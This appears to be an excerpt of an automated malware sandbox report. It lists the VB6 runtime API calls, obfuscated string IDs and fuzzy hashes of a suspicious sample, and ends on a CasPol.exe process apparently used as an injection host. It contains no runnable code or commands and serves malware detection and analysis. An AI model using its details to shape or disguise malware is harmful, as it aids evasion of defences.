                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,cheve,?), ref: 0041FD08
                                                • __vbaFreeObj.MSVBVM60(?,?,00401356), ref: 0041FD13
                                                • #525.MSVBVM60(000000A9,?,?,00401356), ref: 0041FD1D
                                                • __vbaStrMove.MSVBVM60(000000A9,?,?,00401356), ref: 0041FD27
                                                • #610.MSVBVM60(?,00008008,?), ref: 0041FD30
                                                • #557.MSVBVM60(?,?,00008008,?), ref: 0041FD39
                                                • __vbaFreeVar.MSVBVM60(?,?,00008008,?), ref: 0041FD4F
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,00008008,?), ref: 0041FD73
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FDAC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 0041FDE1
                                                • #515.MSVBVM60(?,00000008,000000BF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FE1F
                                                • __vbaStrVarMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FE28
                                                • __vbaStrMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FE32
                                                • __vbaFreeObj.MSVBVM60(?,?,00000008,000000BF), ref: 0041FE3A
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000BF), ref: 0041FE49
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,?,?,00401356), ref: 0041FE64
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041FEB1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000F8), ref: 0041FEF8
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C60,000000F8), ref: 0041FF22
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000F8), ref: 0041FF2A
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,00008008,?), ref: 0041FF42
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FF7B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041FFB0
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041FFDA
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041FFE2
                                                • __vbaFreeStr.MSVBVM60(0042005F), ref: 00420031
                                                • __vbaFreeStr.MSVBVM60(0042005F), ref: 00420039
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$CheckHresult$New2$List$#515#525#557#593#610#670ChkstkCopy
                                                • String ID: cheve$skuddermudderets
                                                • API String ID: 4055753005-3782447816
                                                • Opcode ID: 6325d072a60537f3d0318f922c643290c7513632171568f89bd52d1670cbcf59
                                                • Instruction ID: 18720c84a38af6259d993be9102dae01e15c4b207416b3fab5ef48ef122c675b
                                                • Opcode Fuzzy Hash: 6325d072a60537f3d0318f922c643290c7513632171568f89bd52d1670cbcf59
                                                • Instruction Fuzzy Hash: 2AF10871900218AFDB10EFA5DD45BDDBBB5BF04304F20017AE506BB2A2DB785A89DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042036A, Relevance: 89.6, APIs: 41, Strings: 10, Instructions: 340COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420388
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 004203B9
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 004203D1
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042040A
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000160), ref: 00420454
                                                • #575.MSVBVM60(?,00000009), ref: 0042048D
                                                • __vbaVarTstNe.MSVBVM60(00008008,?,?,00000009), ref: 004204AE
                                                • __vbaFreeObj.MSVBVM60(00008008,?,?,00000009), ref: 004204BD
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000009,?,00008008,?,?,00000009), ref: 004204CC
                                                • __vbaOnError.MSVBVM60(00000000,?,?,00401356), ref: 004204E1
                                                • __vbaPrintObj.MSVBVM60(00403D30,00000000,?,00000000,?,?,00401356), ref: 004204F2
                                                • #651.MSVBVM60(00000002), ref: 0042050C
                                                • __vbaStrMove.MSVBVM60(00000002), ref: 00420516
                                                • __vbaStrCmp.MSVBVM60(Rerefief,00000000,00000002), ref: 00420521
                                                • __vbaFreeStr.MSVBVM60(Rerefief,00000000,00000002), ref: 00420537
                                                • __vbaFreeVar.MSVBVM60(Rerefief,00000000,00000002), ref: 0042053F
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,Rerefief,00000000,00000002), ref: 00420566
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 004205C8
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 00420627
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 00420649
                                                • #690.MSVBVM60(bedrageriets,Azulmic,Regular6,HOLLO), ref: 00420662
                                                • #685.MSVBVM60(Rerefief,00000000,00000002), ref: 00420667
                                                • __vbaObjSet.MSVBVM60(?,00000000,Rerefief,00000000,00000002), ref: 00420671
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403FC4,0000001C), ref: 004206B8
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403FC4,0000001C), ref: 004206E7
                                                • __vbaStrCat.MSVBVM60(Verdantly,bopl), ref: 00420705
                                                • __vbaStrMove.MSVBVM60(Verdantly,bopl), ref: 0042070F
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,Verdantly,bopl), ref: 00420727
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 00420789
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000140), ref: 004207E8
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,00000140), ref: 0042080A
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 00420822
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042085B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000100), ref: 004208A5
                                                • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 004208C4
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401356), ref: 004208CD
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,00401356), ref: 004208DF
                                                • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401356), ref: 004208EA
                                                • __vbaFreeStr.MSVBVM60(00420940,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042092A
                                                • __vbaFreeStr.MSVBVM60(00420940,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420932
                                                • __vbaFreeVar.MSVBVM60(00420940,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042093A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresult$New2$ListMove$#575#651#685#690CallChkstkCopyErrorLatePrint
                                                • String ID: 08$@B$Azulmic$DADAP$HOLLO$Regular6$Rerefief$Verdantly$bedrageriets$bopl
                                                • API String ID: 2545346589-143889596
                                                • Opcode ID: 7373b828d3c4417843d0b2f214226b67e3a9a72bcaae62e92680958489f69329
                                                • Instruction ID: d54788ff33686d1c37b5f9d7700b70cb90c309873e4bf02c2b949799d1a06d51
                                                • Opcode Fuzzy Hash: 7373b828d3c4417843d0b2f214226b67e3a9a72bcaae62e92680958489f69329
                                                • Instruction Fuzzy Hash: AAF1F970E00228AFDB10EFA1DD45F9DB7B4BF04705F5040AAE50AB72A2DB785A85DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00420967, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420982
                                                • __vbaVarDup.MSVBVM60 ref: 004209A8
                                                • #607.MSVBVM60(?,00000058,?), ref: 004209B7
                                                • __vbaStrVarMove.MSVBVM60(?,?,00000058,?), ref: 004209C0
                                                • __vbaStrMove.MSVBVM60(?,?,00000058,?), ref: 004209CA
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000058,?), ref: 004209D9
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 004209F4
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420A21
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000158), ref: 00420A56
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 00420A7D
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420AB6
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000E8), ref: 00420AEB
                                                • #517.MSVBVM60(?), ref: 00420B02
                                                • __vbaStrMove.MSVBVM60(?), ref: 00420B0C
                                                • __vbaStrCmp.MSVBVM60(?,00000000,?), ref: 00420B15
                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?), ref: 00420B35
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420B47
                                                • __vbaVarDup.MSVBVM60 ref: 00420B6F
                                                • #522.MSVBVM60(?,?), ref: 00420B7C
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420B85
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 00420B8F
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420B9E
                                                • __vbaVarDup.MSVBVM60 ref: 00420BBA
                                                • #520.MSVBVM60(?,?), ref: 00420BC7
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420BD0
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 00420BDA
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420BE9
                                                • #535.MSVBVM60 ref: 00420BF1
                                                • __vbaFreeStr.MSVBVM60(00420C55), ref: 00420C3F
                                                • __vbaFreeStr.MSVBVM60(00420C55), ref: 00420C47
                                                • __vbaFreeStr.MSVBVM60(00420C55), ref: 00420C4F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$List$CheckHresultNew2$#517#520#522#535#607Chkstk
                                                • String ID: Subreptitiously$anoperineal
                                                • API String ID: 3004089779-3635317160
                                                • Opcode ID: 40825c9dfcabe4a3ab1d9fcf253a69e6a2794f7dff297a098da95b8e1400b8c3
                                                • Instruction ID: 8097fc900a860680d8ce459e452ae5e11f65a550647a67729f6386677a3a4daf
                                                • Opcode Fuzzy Hash: 40825c9dfcabe4a3ab1d9fcf253a69e6a2794f7dff297a098da95b8e1400b8c3
                                                • Instruction Fuzzy Hash: DA81FC71D00218ABDB00EBE1DD46EEDB7B8AF44304F60456AE106BB1A1EB785A49CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F062, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041F07F
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 0041F0A4
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F0DD
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F112
                                                • #652.MSVBVM60(?,00000002), ref: 0041F13D
                                                • __vbaVarTstEq.MSVBVM60(00008008,?,?,00000002), ref: 0041F158
                                                • __vbaFreeObj.MSVBVM60(00008008,?,?,00000002), ref: 0041F167
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,00000002), ref: 0041F176
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041F1A0
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F1D9
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001B8), ref: 0041F20E
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041F22D
                                                • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041F236
                                                • __vbaStrMove.MSVBVM60(00000000), ref: 0041F240
                                                • #517.MSVBVM60(00000000,00000000), ref: 0041F246
                                                • __vbaStrMove.MSVBVM60(00000000,00000000), ref: 0041F250
                                                • __vbaFreeStr.MSVBVM60(00000000,00000000), ref: 0041F258
                                                • __vbaFreeObjList.MSVBVM60(00000002,00000000,00000000,00000000,00000000), ref: 0041F267
                                                • __vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0041F272
                                                • __vbaVarDup.MSVBVM60 ref: 0041F28B
                                                • #528.MSVBVM60(?,?), ref: 0041F298
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F2A1
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041F2AB
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F2BA
                                                • __vbaFreeStr.MSVBVM60(0041F30B), ref: 0041F2FD
                                                • __vbaFreeStr.MSVBVM60(0041F30B), ref: 0041F305
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$List$CheckHresultNew2$#517#528#652CallChkstkLate
                                                • String ID: Apollo$fraena
                                                • API String ID: 1415655392-2588804562
                                                • Opcode ID: 1d1d1931ccd6aaafdab5004d1bdd10bbde7fb5c5dff55e265fcece11971345d9
                                                • Instruction ID: 00b82b3a2883c463b40858e0eea23d350dffe47f5fe7c32676a2be355150ee94
                                                • Opcode Fuzzy Hash: 1d1d1931ccd6aaafdab5004d1bdd10bbde7fb5c5dff55e265fcece11971345d9
                                                • Instruction Fuzzy Hash: CD710A71D00218ABDB10EFA1CD46FDDB7B8BF48304F20416AE506B71A2EB795A49CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042007A, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420098
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 004200C3
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004200FC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000070), ref: 00420134
                                                • #714.MSVBVM60(?,00000004,00000000), ref: 0042015F
                                                • __vbaVarTstGt.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0042017A
                                                • __vbaFreeObj.MSVBVM60(00008003,?,?,00000004,00000000), ref: 00420189
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,00008003,?,?,00000004,00000000), ref: 00420198
                                                • __vbaVarDup.MSVBVM60 ref: 004201C3
                                                • #518.MSVBVM60(?,?), ref: 004201D0
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 004201D9
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 004201E3
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 004201F2
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,?,?,?,?,?,00401356), ref: 0042020D
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 00420263
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000060), ref: 004202B9
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C60,00000060), ref: 004202E3
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,00000060), ref: 004202EB
                                                • __vbaStrCopy.MSVBVM60(?,?,00401356), ref: 004202F8
                                                • __vbaFreeStr.MSVBVM60(0042034F,?,?,00401356), ref: 00420341
                                                • __vbaFreeStr.MSVBVM60(0042034F,?,?,00401356), ref: 00420349
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresultMove$ListNew2$#518#714ChkstkCopy
                                                • String ID: Frigrelsesmidlerne5$SVIRREFLUERS
                                                • API String ID: 33727100-1709780716
                                                • Opcode ID: 1100be33627a259475e4e8b7ca1238f38c13299dfb9f27eb1a15b4f0940bc2a4
                                                • Instruction ID: a89fde47f55e41e632a99cb9acf2b62e9ec8964940ff3dba0f039225eed9f556
                                                • Opcode Fuzzy Hash: 1100be33627a259475e4e8b7ca1238f38c13299dfb9f27eb1a15b4f0940bc2a4
                                                • Instruction Fuzzy Hash: DB71EB71A00228EFDB10EFA5DC85BDDBBB8BF04304F5040AAE145B71A1DB785A89DF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00420C68, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420C84
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 00420CB1
                                                • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420CDE
                                                • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420CE8
                                                • __vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420CF0
                                                • #610.MSVBVM60(00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420D00
                                                • #553.MSVBVM60(?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420D0D
                                                • __vbaVarTstEq.MSVBVM60(00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420D28
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000006,?,00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE), ref: 00420D3B
                                                • __vbaOnError.MSVBVM60(000000FF,?,?,00401356), ref: 00420D54
                                                • #578.MSVBVM60(trinovantes,000000FF,?,?,00401356), ref: 00420D65
                                                • #526.MSVBVM60(?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420D7D
                                                • __vbaStrVarMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420D86
                                                • __vbaStrMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420D90
                                                • __vbaFreeVar.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420D98
                                                • #615.MSVBVM60(?,?,00401356), ref: 00420DA4
                                                • __vbaFreeStr.MSVBVM60(00420DF0), ref: 00420DDA
                                                • __vbaFreeStr.MSVBVM60(00420DF0), ref: 00420DE2
                                                • __vbaFreeStr.MSVBVM60(00420DF0), ref: 00420DEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$#526#553#578#610#615#703ChkstkCopyErrorList
                                                • String ID: Gg$trinovantes
                                                • API String ID: 2274906189-1238276640
                                                • Opcode ID: 962dda4c766637855efc5671986eca3cb55e1f2163b88d9f602cf8189f923558
                                                • Instruction ID: eb52139d1a58f8f29e17e115710e9ff0b18782440d1f0c4e17bb61244fdeea2e
                                                • Opcode Fuzzy Hash: 962dda4c766637855efc5671986eca3cb55e1f2163b88d9f602cf8189f923558
                                                • Instruction Fuzzy Hash: B64101B1C0021CAADB10EFE5C946BDEBBB8BF44718F60416AF111771E1EB785649CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00420E0D, Relevance: 27.2, APIs: 18, Instructions: 219COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420E2B
                                                • __vbaAryConstruct2.MSVBVM60(?,00404064,00000011,?,?,?,?,00401356), ref: 00420E5A
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,00404064,00000011,?,?,?,?,00401356), ref: 00420E72
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420EAB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001C8), ref: 00420EE9
                                                • #698.MSVBVM60(?,?), ref: 00420F06
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?), ref: 00420F1E
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420F57
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001E0), ref: 00420FA1
                                                • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 00420FDA
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?,00008008,?), ref: 00420FF0
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401356), ref: 00421002
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,?,?,?,?,?,00401356), ref: 0042102C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 00421082
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 004210DE
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 004210FD
                                                • __vbaUbound.MSVBVM60(00000001,?), ref: 00421108
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0042119E,?,?,?,?,?,00401356), ref: 00421198
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$CheckHresult$FreeNew2$List$#698ChkstkConstruct2DestructUbound
                                                • String ID:
                                                • API String ID: 2830902964-0
                                                • Opcode ID: d3cf0ed14dbe9cc84322a79c17bfafc169c584cf905b4f36ceb42571fcbe83f8
                                                • Instruction ID: 15a67e351dd35ee7de7410c88fe5626377d6e717f741d76486c53563db9a7fb4
                                                • Opcode Fuzzy Hash: d3cf0ed14dbe9cc84322a79c17bfafc169c584cf905b4f36ceb42571fcbe83f8
                                                • Instruction Fuzzy Hash: F4A11A71A00228EFDB10DFA4DD45F9DBBB5BF08304F5080AAE549B72A1DB785A84DF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F86C, Relevance: 15.2, APIs: 10, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041F888
                                                • #582.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F8B7
                                                • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F8BC
                                                • #539.MSVBVM60(00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F8DD
                                                • __vbaStrVarMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F8E6
                                                • __vbaStrMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F8F0
                                                • __vbaFreeVar.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F8F8
                                                • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000010,00000000,00000036,00000036,00000050,00000036,00000091), ref: 0041F910
                                                • __vbaFreeStr.MSVBVM60(0041FA86), ref: 0041FA75
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041FA86), ref: 0041FA80
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$FreeMove$#539#582ChkstkDestructRedim
                                                • String ID:
                                                • API String ID: 1927214042-0
                                                • Opcode ID: 26454631d866387a8119b812323d68e6251eeefbb860d98dbe8a577afee26a81
                                                • Instruction ID: eabebc5d4ec2dec318e4862ec41f942e7c4a0754b07e6f05378083c943c8d810
                                                • Opcode Fuzzy Hash: 26454631d866387a8119b812323d68e6251eeefbb860d98dbe8a577afee26a81
                                                • Instruction Fuzzy Hash: B2811075A101459FDB19DFA8D985F6ABBB0AF09710F06818AFD509F3E2C778E442CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00421444, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,0042135E,?,?,?,?,00401356), ref: 0042144A
                                                • #644.MSVBVM60(?,?,0042135E,?,?,?,?,00401356), ref: 00421474
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: #644Chkstk__vba
                                                • String ID: 8wL
                                                • API String ID: 3537395942-3391983536
                                                • Opcode ID: 12b7e30cdacb3a6cac22a75b7480167c170e734cc3c8c422592ac66d1ccca95c
                                                • Instruction ID: 55f39d54ae3e600ff5c48cfd089e1e8e11abb8126e3a43a06374aa452dded26c
                                                • Opcode Fuzzy Hash: 12b7e30cdacb3a6cac22a75b7480167c170e734cc3c8c422592ac66d1ccca95c
                                                • Instruction Fuzzy Hash: 3BF0E539202741B9C7387B64AF1269ABB78EF0A750F50006AFB01AF2B1D3B05942E75C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: CasPol.exe PID: 4576 Parent PID: 5644 CasPol.exeCOMMON

                                                Executed Functions

                                                Function 00E2B2C8, Relevance: 2.8, Instructions: 2792COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cb806a74438324885e79d50dd06ee470fb250bc54933c4dd4015466897f1979
                                                • Instruction ID: d0d4297b7fd5c9d7891ce0349987a05ef968e7ac02316efaaa94102ac8f18a90
                                                • Opcode Fuzzy Hash: 8cb806a74438324885e79d50dd06ee470fb250bc54933c4dd4015466897f1979
                                                • Instruction Fuzzy Hash: 68530B31D14B298ACB20EF68C844699F7B1FF99304F11D79AE45977221EB70AAD4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E2B269, Relevance: 2.8, Instructions: 2763COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
